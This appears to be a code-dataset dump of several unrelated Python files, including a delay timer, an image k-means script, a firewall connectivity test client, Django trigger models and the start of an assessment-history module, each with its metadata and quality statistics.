hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c70bf8219d2bb2dabd3039c6feeeaba05de046c4 | 1,701 | py | Python | main.py | hasanzadeh99/mapna_test_2021 | 1e2e50a9aff32e2d730bf3d0fd20393e5aea0872 | [
"MIT"
] | null | null | null | main.py | hasanzadeh99/mapna_test_2021 | 1e2e50a9aff32e2d730bf3d0fd20393e5aea0872 | [
"MIT"
] | null | null | null | main.py | hasanzadeh99/mapna_test_2021 | 1e2e50a9aff32e2d730bf3d0fd20393e5aea0872 | [
"MIT"
] | null | null | null | import time
old_input_value = False
flag_falling_edge = None
start = None
flag_output_mask = False
DELAY_CONST = 10  # delay time from the falling edge, in seconds
output = None
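# response_function() implements an off-delay timer on a sampled digital input:
# the output tracks the input, but after a falling edge it is held (masked) at
# its previous level for DELAY_CONST seconds before being cleared.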
def response_function():
    global old_input_value, flag_falling_edge, start, flag_output_mask, output
    if flag_falling_edge:
        output = True
        end = time.perf_counter()
        if end - start > DELAY_CONST:
            output = 0
            flag_falling_edge = 0
            flag_output_mask = False
    input_value = bool(int(input('Please Enter your Input Value: ')))
    if old_input_value == False and input_value == True:
        if not flag_output_mask: output = input_value
        old_input_value = input_value
        print('Input Rising Edge detected ... ')
        print(f'output is: {output}')
    elif old_input_value == False and input_value == False:
        if not flag_output_mask: output = input_value
        old_input_value = input_value
        print(f'output is: {output}')
    elif old_input_value == True and input_value == True:
        old_input_value = input_value
        if not flag_output_mask: output = input_value
        print(f'output is: {output}')
    elif old_input_value == True and input_value == False:
        start = time.perf_counter()
        print('Input Falling Edge detected ... ')
        flag_falling_edge = True
        flag_output_mask = True
        old_input_value = input_value
        print(f'output is: {output}')


if __name__ == '__main__':
    DELAY_CONST = int(input("Hello \nPlease Enter Your delay value here :"))
    while True:
        response_function()
| 25.772727 | 79 | 0.621399 | 216 | 1,701 | 4.564815 | 0.212963 | 0.233266 | 0.131846 | 0.081136 | 0.43002 | 0.43002 | 0.39858 | 0.348884 | 0.323529 | 0.286004 | 0 | 0.003356 | 0.299236 | 1,701 | 65 | 80 | 26.169231 | 0.823826 | 0.019988 | 0 | 0.317073 | 0 | 0 | 0.139711 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0 | 0.02439 | 0 | 0.04878 | 0.146341 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c70ef8c2db16a8357afdb58004c2cb5a69fd6d01 | 326 | py | Python | tests/conftest.py | badarsebard/terraform-pytest | 58c8096f0405ec1d0061723fc1dd2d099655c3c5 | [
"MIT"
] | null | null | null | tests/conftest.py | badarsebard/terraform-pytest | 58c8096f0405ec1d0061723fc1dd2d099655c3c5 | [
"MIT"
] | null | null | null | tests/conftest.py | badarsebard/terraform-pytest | 58c8096f0405ec1d0061723fc1dd2d099655c3c5 | [
"MIT"
] | 1 | 2021-11-19T16:36:31.000Z | 2021-11-19T16:36:31.000Z | from .terraform import TerraformManager
import pytest
from _pytest.tmpdir import TempPathFactory
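# Session-scoped fixture: creates one TerraformManager deployment for the whole
# test session and yields it to every test that requests `tfenv`; teardown runs
# when the context manager exits.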
@pytest.fixture(scope='session')
def tfenv(tmp_path_factory: TempPathFactory):
    env_vars = {
    }
    with TerraformManager(path_factory=tmp_path_factory, env_vars=env_vars) as deployment:
        yield deployment
| 25.076923 | 90 | 0.760736 | 38 | 326 | 6.289474 | 0.552632 | 0.138075 | 0.117155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171779 | 326 | 12 | 91 | 27.166667 | 0.885185 | 0 | 0 | 0 | 0 | 0 | 0.021472 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
c71481b1ca69523b36b0345fe995b27fb6d37535 | 2,533 | py | Python | pythoncode/kmeansimage.py | loganpadon/PokemonOneShot | 22f9904250c8c90b4fe4573d6ca060fd9f95c1d3 | [
"MIT"
] | null | null | null | pythoncode/kmeansimage.py | loganpadon/PokemonOneShot | 22f9904250c8c90b4fe4573d6ca060fd9f95c1d3 | [
"MIT"
] | 1 | 2019-04-04T20:40:20.000Z | 2019-04-04T20:40:20.000Z | pythoncode/kmeansimage.py | loganpadon/PokemonOneShot | 22f9904250c8c90b4fe4573d6ca060fd9f95c1d3 | [
"MIT"
] | null | null | null | # import the necessary packages
from sklearn.cluster import KMeans
import numpy as np
import skimage
import matplotlib.pyplot as plt
import argparse
import cv2
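# mean_image(): replaces every pixel with the centroid of the k-means cluster
# it was assigned to, then converts the quantized image from L*a*b* back to RGB.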
def mean_image(image, clt):
    image2 = image
    for x in range(len(image2)):
        classes = clt.predict(image2[x])
        for y in range(len(classes)):
            image2[x, y] = clt.cluster_centers_[classes[y]]
    image2 = skimage.color.lab2rgb(image2)
    return image2
def plot_colors(hist, centroids):
    # initialize the bar chart representing the relative frequency
    # of each of the colors
    bar = np.zeros((50, 300, 3), dtype="uint8")
    startX = 0
    # loop over the percentage of each cluster and the color of
    # each cluster
    for (percent, color) in zip(hist, centroids):
        print(color)
        c = skimage.color.lab2rgb([[color]])
        print(c * 255)
        # plot the relative percentage of each cluster
        endX = startX + (percent * 300)
        cv2.rectangle(bar, (int(startX), 0), (int(endX), 50),
                      c[0][0] * 255, -1)
        startX = endX
    # return the bar chart
    return bar
def centroid_histogram(clt):
    # grab the number of different clusters and create a histogram
    # based on the number of pixels assigned to each cluster
    numLabels = np.arange(0, len(np.unique(clt.labels_)) + 1)
    (hist, _) = np.histogram(clt.labels_, bins=numLabels)
    # normalize the histogram, such that it sums to one
    hist = hist.astype("float")
    hist /= hist.sum()
    # return the histogram
    return hist
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required = True, help = "Path to the image")
ap.add_argument("-c", "--clusters", required = True, type = int,
help = "# of clusters")
args = vars(ap.parse_args())
# load the image and convert it from BGR to RGB so that
# we can display it with matplotlib
image = cv2.imread(args["image"])
image2 = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = skimage.color.rgb2lab(image2)
# show our image
plt.figure()
plt.axis("off")
plt.imshow(image2)
# reshape the image to be a list of pixels
imagedata = image.reshape((image.shape[0] * image.shape[1], 3))
# cluster the pixel intensities
clt = KMeans(n_clusters = args["clusters"])
clt.fit(imagedata)
hist = centroid_histogram(clt)
bar = plot_colors(hist, clt.cluster_centers_)
# show our color bar
plt.figure()
plt.axis("off")
plt.imshow(bar)
imagek = mean_image(image, clt)
plt.figure()
plt.axis("off")
plt.imshow(imagek)
plt.show()
| 28.460674 | 78 | 0.696802 | 378 | 2,533 | 4.621693 | 0.367725 | 0.013738 | 0.022324 | 0.027476 | 0.048082 | 0.048082 | 0.048082 | 0 | 0 | 0 | 0 | 0.023301 | 0.186735 | 2,533 | 88 | 79 | 28.784091 | 0.824757 | 0.281484 | 0 | 0.140351 | 0 | 0 | 0.04851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.122807 | null | null | 0.035088 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c717ca8a8d1e158509ebb8f364af201eeca89e64 | 296 | py | Python | docs_src/options/callback/tutorial001.py | madkinsz/typer | a1520dcda685220a9a796288f5eaaebd00d68845 | [
"MIT"
] | 7,615 | 2019-12-24T13:08:20.000Z | 2022-03-31T22:07:53.000Z | docs_src/options/callback/tutorial001.py | madkinsz/typer | a1520dcda685220a9a796288f5eaaebd00d68845 | [
"MIT"
] | 351 | 2019-12-24T22:17:54.000Z | 2022-03-31T15:35:08.000Z | docs_src/options/callback/tutorial001.py | jina-ai/typer | 8b5e14b25ddf0dd777403015883301b17bedcee0 | [
"MIT"
] | 360 | 2019-12-24T15:29:59.000Z | 2022-03-30T20:33:10.000Z | import typer
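# Typer option callback: runs before the command body, validating the supplied
# value and raising BadParameter (rendered as a friendly CLI error) when the
# value is not accepted.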
def name_callback(value: str):
    if value != "Camila":
        raise typer.BadParameter("Only Camila is allowed")
    return value


def main(name: str = typer.Option(..., callback=name_callback)):
    typer.echo(f"Hello {name}")


if __name__ == "__main__":
    typer.run(main)
| 18.5 | 64 | 0.658784 | 39 | 296 | 4.74359 | 0.538462 | 0.12973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.199324 | 296 | 15 | 65 | 19.733333 | 0.780591 | 0 | 0 | 0 | 0 | 0 | 0.162162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c719c2fbf99902f8dda33cce99ae748883db934d | 3,276 | py | Python | qft-client-py2.py | bocajspear1/qft | 7a8f3bb5d24bf173489dc4ad6159021e9365e9c4 | [
"MIT"
] | null | null | null | qft-client-py2.py | bocajspear1/qft | 7a8f3bb5d24bf173489dc4ad6159021e9365e9c4 | [
"MIT"
] | null | null | null | qft-client-py2.py | bocajspear1/qft | 7a8f3bb5d24bf173489dc4ad6159021e9365e9c4 | [
"MIT"
] | null | null | null | import socket
import threading
from time import sleep
from threading import Thread
import json
import sys
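# Python 2 probe client: for each entry in client.cfg, send "QFT_REQUEST" over
# TCP or UDP in a worker thread and report PASSED/FAILED against the expected
# "test_for" outcome.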
def display_test(address, port, text_result, test):
    if (text_result == "QFT_SUCCESS" and test == True) or (text_result != "QFT_SUCCESS" and test == False):
        # Test is correct
        print "PASSED: Test for " + str(address) + ":" + str(port) + " resulted in " + str(test)
    else:
        print "FAILED: Test for " + str(address) + ":" + str(port) + " did not result in " + str(test)
def TCPTest(address, port, test):
    try:
        my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        my_socket.settimeout(2)
        my_socket.connect((address, port))
        fileobj = my_socket.makefile("rw")
        fileobj.write('QFT_REQUEST\n')
        fileobj.flush()
        result = fileobj.readline().strip()
        display_test(address, port, result, test)
    except socket.error as e:
        #print(e)
        display_test(address, port, "FAILED", test)
    except socket.timeout as e:
        display_test(address, port, "FAILED", test)
    my_socket.close()
def UDPTest(address, port, test):
    try:
        my_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        my_socket.settimeout(2)
        my_socket.sendto("QFT_REQUEST".encode('utf-8'), (address, port))
        # receive data from client (data, addr)
        d = my_socket.recvfrom(1024)
        reply = d[0]
        addr = d[1]
        result = d[0].decode('utf-8').strip()
        display_test(address, port, result, test)
    except socket.timeout as e:
        display_test(address, port, "FAILED", test)
try:
    timeout = 5
    if len(sys.argv) > 1:
        if (len(sys.argv) - 1) % 2 != 0:
            print "\nInvalid number of arguments\n\n-t Time between tests in seconds\n"
            sys.exit()
        else:
            if sys.argv[1] == "-t" and sys.argv[2].isdigit() and int(sys.argv[2]) > 2:
                timeout = int(sys.argv[2])
            else:
                print "\nInvalid arguments\n\n-t Time between tests in seconds\n"
                sys.exit()

    print "\nqft-client.py v1.s\n\n"
    json_cfg = json.loads(open("client.cfg").read())
    print "Config loaded. Starting tests in 1 second...\n\n"
    sleep(1)
    while True:
        for item in json_cfg:
            if item["type"] == "tcp":
                t = Thread(target=TCPTest, args=(item["remote_address"], item["port"], item["test_for"]))
            elif item["type"] == "udp":
                t = Thread(target=UDPTest, args=(item["remote_address"], item["port"], item["test_for"]))
            else:
                print "Invalid Type!"
                continue  # no thread was created for this entry, so skip t.start()
            t.start()
        sleep(timeout)
        print "\n=======================================================\n"
except IOError as e:
    print("Config file, client.cfg, not found")
    sys.exit()
except ValueError as e:
    print("Error in config JSON")
    sys.exit()
| 30.616822 | 108 | 0.514042 | 387 | 3,276 | 4.268734 | 0.30491 | 0.066586 | 0.065375 | 0.079903 | 0.423123 | 0.407385 | 0.312954 | 0.2954 | 0.2954 | 0.197337 | 0 | 0.011225 | 0.347375 | 3,276 | 106 | 109 | 30.90566 | 0.761459 | 0.01862 | 0 | 0.28169 | 0 | 0 | 0.175845 | 0.019002 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.014085 | 0.084507 | null | null | 0.140845 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c71ef3a9007aa0aebc08a606ded35bff47c69406 | 242 | py | Python | cnn/struct/layer/parse_tensor_module.py | hslee1539/GIS_GANs | 6901c830b924e59fd06247247db3f925bab26583 | [
"MIT"
] | null | null | null | cnn/struct/layer/parse_tensor_module.py | hslee1539/GIS_GANs | 6901c830b924e59fd06247247db3f925bab26583 | [
"MIT"
] | null | null | null | cnn/struct/layer/parse_tensor_module.py | hslee1539/GIS_GANs | 6901c830b924e59fd06247247db3f925bab26583 | [
"MIT"
] | null | null | null | from tensor.main_module import Tensor
import numpy as np
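# Coerce a numpy array into a Tensor (or pass an existing Tensor through).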
def getTensor(value):
    if type(value) is np.ndarray:
        return Tensor.numpy2Tensor(value)
    elif type(value) is Tensor:
        return value
    else:
        raise Exception | 24.2 | 41 | 0.68595 | 33 | 242 | 5 | 0.636364 | 0.109091 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005525 | 0.252066 | 242 | 10 | 42 | 24.2 | 0.906077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c72423d0c9647d3f45e1ae401dca8a26496518f2 | 265 | py | Python | HackerRank/Calendar Module/solution.py | nikku1234/Code-Practise | 94eb6680ea36efd10856c377000219285f77e5a4 | [
"Apache-2.0"
] | 9 | 2020-07-02T06:06:17.000Z | 2022-02-26T11:08:09.000Z | HackerRank/Calendar Module/solution.py | nikku1234/Code-Practise | 94eb6680ea36efd10856c377000219285f77e5a4 | [
"Apache-2.0"
] | 1 | 2021-11-04T17:26:36.000Z | 2021-11-04T17:26:36.000Z | HackerRank/Calendar Module/solution.py | nikku1234/Code-Practise | 94eb6680ea36efd10856c377000219285f77e5a4 | [
"Apache-2.0"
] | 8 | 2021-01-31T10:31:12.000Z | 2022-03-13T09:15:55.000Z | # Enter your code here. Read input from STDIN. Print output to STDOUT
import calendar
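# calendar.weekday(year, month, day) returns 0 for Monday through 6 for Sunday,
# so the result indexes directly into the day-name list below.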
mm, dd, yyyy = map(int, input().split())
day = ["MONDAY", "TUESDAY", "WEDNESDAY", "THURSDAY", "FRIDAY", "SATURDAY", "SUNDAY"]
val = int(calendar.weekday(yyyy, mm, dd))
print(day[val])
| 22.083333 | 78 | 0.698113 | 39 | 265 | 4.74359 | 0.769231 | 0.043243 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116981 | 265 | 11 | 79 | 24.090909 | 0.790598 | 0.25283 | 0 | 0 | 0 | 0 | 0.25641 | 0 | 0 | 0 | 0 | 0.090909 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
c7245a8913ae3a1c31f00b1392df9f4dd3d991e9 | 7,560 | py | Python | scale/trigger/models.py | stevevarner/scale | 9623b261db4ddcf770f00df16afc91176142bb7c | [
"Apache-2.0"
] | null | null | null | scale/trigger/models.py | stevevarner/scale | 9623b261db4ddcf770f00df16afc91176142bb7c | [
"Apache-2.0"
] | null | null | null | scale/trigger/models.py | stevevarner/scale | 9623b261db4ddcf770f00df16afc91176142bb7c | [
"Apache-2.0"
] | null | null | null | """Defines the models for trigger rules and events"""
from __future__ import unicode_literals
import django.contrib.postgres.fields
from django.db import models, transaction
from django.utils.timezone import now
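# Custom managers keep creation and archiving logic in one place: callers go
# through create_trigger_event()/create_trigger_rule() instead of constructing
# model instances by hand, so required fields are always validated.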
class TriggerEventManager(models.Manager):
    """Provides additional methods for handling trigger events
    """

    def create_trigger_event(self, trigger_type, rule, description, occurred):
        """Creates a new trigger event and returns the event model. The given rule model, if not None, must have already
        been saved in the database (it must have an ID). The returned trigger event model will be saved in the database.

        :param trigger_type: The type of the trigger that occurred
        :type trigger_type: str
        :param rule: The rule that triggered the event, possibly None
        :type rule: :class:`trigger.models.TriggerRule`
        :param description: The JSON description of the event as a dict
        :type description: dict
        :param occurred: When the event occurred
        :type occurred: :class:`datetime.datetime`
        :returns: The new trigger event
        :rtype: :class:`trigger.models.TriggerEvent`
        """

        if trigger_type is None:
            raise Exception('Trigger event must have a type')
        if description is None:
            raise Exception('Trigger event must have a JSON description')
        if occurred is None:
            raise Exception('Trigger event must have a timestamp')

        event = TriggerEvent()
        event.type = trigger_type
        event.rule = rule
        event.description = description
        event.occurred = occurred
        event.save()
        return event
class TriggerEvent(models.Model):
    """Represents an event where a trigger occurred

    :keyword type: The type of the trigger that occurred
    :type type: :class:`django.db.models.CharField`
    :keyword rule: The rule that triggered this event, possibly None (some events are not triggered by rules)
    :type rule: :class:`django.db.models.ForeignKey`
    :keyword description: JSON description of the event. This will contain fields specific to the type of the trigger
        that occurred.
    :type description: :class:`django.contrib.postgres.fields.JSONField`
    :keyword occurred: When the event occurred
    :type occurred: :class:`django.db.models.DateTimeField`
    """

    type = models.CharField(db_index=True, max_length=50)
    rule = models.ForeignKey('trigger.TriggerRule', blank=True, null=True, on_delete=models.PROTECT)
    description = django.contrib.postgres.fields.JSONField(default=dict)
    occurred = models.DateTimeField(db_index=True)

    objects = TriggerEventManager()

    class Meta(object):
        """meta information for the db"""
        db_table = 'trigger_event'
class TriggerRuleManager(models.Manager):
    """Provides additional methods for handling trigger rules
    """

    @transaction.atomic
    def archive_trigger_rule(self, trigger_rule_id):
        """Archives the trigger rule (will no longer be active) with the given ID

        :param trigger_rule_id: The ID of the trigger rule to archive
        :type trigger_rule_id: int
        """

        rule = TriggerRule.objects.select_for_update().get(pk=trigger_rule_id)
        rule.is_active = False
        rule.archived = now()
        rule.save()

    def create_trigger_rule(self, trigger_type, configuration, name='', is_active=True):
        """Creates a new trigger rule and returns the rule model. The returned trigger rule model will be saved in the
        database.

        :param trigger_type: The type of this trigger rule
        :type trigger_type: str
        :param configuration: The rule configuration
        :type configuration: :class:`trigger.configuration.TriggerRuleConfiguration`
        :param name: An optional name for the trigger
        :type name: str
        :param is_active: Whether or not the trigger should be active
        :type is_active: bool
        :returns: The new trigger rule
        :rtype: :class:`trigger.models.TriggerRule`
        :raises trigger.configuration.exceptions.InvalidTriggerRule: If the configuration is invalid
        """

        if not trigger_type:
            raise Exception('Trigger rule must have a type')
        if not configuration:
            raise Exception('Trigger rule must have a configuration')
        configuration.validate()

        rule = TriggerRule()
        rule.type = trigger_type
        rule.name = name
        rule.is_active = is_active
        rule.configuration = configuration.get_dict()
        rule.save()
        return rule

    def get_by_natural_key(self, name):
        """Django method to retrieve a trigger rule for the given natural key. NOTE: All trigger rule names are NOT
        unique. This is implemented to allow the loading of defined system trigger rules which do have unique names.

        :param name: The name of the trigger rule
        :type name: str
        :returns: The trigger rule defined by the natural key
        :rtype: :class:`trigger.models.TriggerRule`
        """

        return self.get(name=name)
class TriggerRule(models.Model):
    """Represents a rule that, when triggered, creates a trigger event

    :keyword type: The type of the trigger for the rule
    :type type: :class:`django.db.models.CharField`
    :keyword name: The identifying name of the trigger rule used by clients for queries
    :type name: :class:`django.db.models.CharField`
    :keyword configuration: JSON configuration for the rule. This will contain fields specific to the type of the
        trigger.
    :type configuration: :class:`django.contrib.postgres.fields.JSONField`
    :keyword is_active: Whether the rule is still active (false once rule is archived)
    :type is_active: :class:`django.db.models.BooleanField`
    :keyword created: When the rule was created
    :type created: :class:`django.db.models.DateTimeField`
    :keyword archived: When the rule was archived (no longer active)
    :type archived: :class:`django.db.models.DateTimeField`
    :keyword last_modified: When the rule was last modified
    :type last_modified: :class:`django.db.models.DateTimeField`
    """

    type = models.CharField(max_length=50, db_index=True)
    name = models.CharField(blank=True, max_length=50)
    configuration = django.contrib.postgres.fields.JSONField(default=dict)
    is_active = models.BooleanField(default=True, db_index=True)

    created = models.DateTimeField(auto_now_add=True)
    archived = models.DateTimeField(blank=True, null=True)
    last_modified = models.DateTimeField(auto_now=True)

    objects = TriggerRuleManager()

    def get_configuration(self):
        """Returns the configuration for this trigger rule

        :returns: The configuration for this trigger rule
        :rtype: :class:`trigger.configuration.trigger_rule.TriggerRuleConfiguration`
        :raises :class:`trigger.configuration.exceptions.InvalidTriggerType`: If the trigger type is invalid
        """

        from trigger.handler import get_trigger_rule_handler

        handler = get_trigger_rule_handler(self.type)
        return handler.create_configuration(self.configuration)

    def natural_key(self):
        """Django method to define the natural key for a trigger rule as the name

        :returns: A tuple representing the natural key
        :rtype: tuple(str,)
        """

        return (self.name,)

    class Meta(object):
        """meta information for the db"""
        db_table = 'trigger_rule'
| 38.769231 | 120 | 0.693783 | 958 | 7,560 | 5.399791 | 0.178497 | 0.055287 | 0.022617 | 0.033056 | 0.313938 | 0.268123 | 0.246279 | 0.1734 | 0.096656 | 0.060313 | 0 | 0.001027 | 0.227116 | 7,560 | 194 | 121 | 38.969072 | 0.884306 | 0.533598 | 0 | 0.060606 | 0 | 0 | 0.072185 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.075758 | 0 | 0.530303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
c724c503b44eb473d695fa13f0446956650e0c2b | 987 | py | Python | barriers/models/history/assessments/economic_impact.py | felix781/market-access-python-frontend | 3b0e49feb4fdf0224816326938a46002aa4a2b1c | [
"MIT"
] | 1 | 2021-12-15T04:14:03.000Z | 2021-12-15T04:14:03.000Z | barriers/models/history/assessments/economic_impact.py | felix781/market-access-python-frontend | 3b0e49feb4fdf0224816326938a46002aa4a2b1c | [
"MIT"
] | 19 | 2019-12-11T11:32:47.000Z | 2022-03-29T15:40:57.000Z | barriers/models/history/assessments/economic_impact.py | felix781/market-access-python-frontend | 3b0e49feb4fdf0224816326938a46002aa4a2b1c | [
"MIT"
] | 2 | 2021-02-09T09:38:45.000Z | 2021-03-29T19:07:09.000Z | from ..base import BaseHistoryItem, GenericHistoryItem
from ..utils import PolymorphicBase
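# Each *HistoryItem subclass maps one changed field of a valuation assessment
# to a display name and a human-readable value; PolymorphicBase dispatches on
# the "field" key to pick the right subclass.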
class ArchivedHistoryItem(BaseHistoryItem):
    field = "archived"
    field_name = "Valuation assessment: Archived"

    def get_value(self, value):
        if value is True:
            return "Archived"
        elif value is False:
            return "Unarchived"


class ExplanationHistoryItem(BaseHistoryItem):
    field = "explanation"
    field_name = "Valuation assessment: Explanation"


class ImpactHistoryItem(BaseHistoryItem):
    field = "impact"
    field_name = "Valuation assessment: Impact"

    def get_value(self, value):
        if value:
            return value.get("name")


class EconomicImpactAssessmentHistoryItem(PolymorphicBase):
    model = "economic_impact_assessment"
    key = "field"
    subclasses = (
